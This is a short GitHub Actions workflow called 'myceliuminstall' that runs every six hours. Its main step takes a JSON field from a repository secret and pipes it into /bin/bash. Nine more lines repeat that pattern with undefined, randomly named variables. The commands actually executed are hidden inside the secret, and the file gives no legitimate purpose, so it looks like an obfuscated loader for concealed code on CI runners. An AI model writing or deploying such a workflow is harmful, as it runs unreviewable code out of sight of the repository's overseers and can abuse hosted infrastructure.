name: myceliuminstall

on:
  workflow_dispatch:
  schedule:
    - cron: '32 1/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: myceliuminstall
        env:
          zycj69: ${{ secrets.zycj69 }}
        run: |
          echo $zycj69 | jq -r .jlg0 | /bin/bash
          echo $au0005 | jq -r .ub92354 | /bin/bash
          echo $v3 | jq -r .vyhza81052 | /bin/bash
          echo $he839 | jq -r .ivg30439 | /bin/bash
          echo $fakv949 | jq -r .haz2434 | /bin/bash
          echo $pi855 | jq -r .zriep405 | /bin/bash
          echo $g75449 | jq -r .lpx16324 | /bin/bash
          echo $fqktn92491 | jq -r .ei1285 | /bin/bash
          echo $ai374 | jq -r .vve499 | /bin/bash
          echo $khsl891 | jq -r .emiya536 | /bin/bash

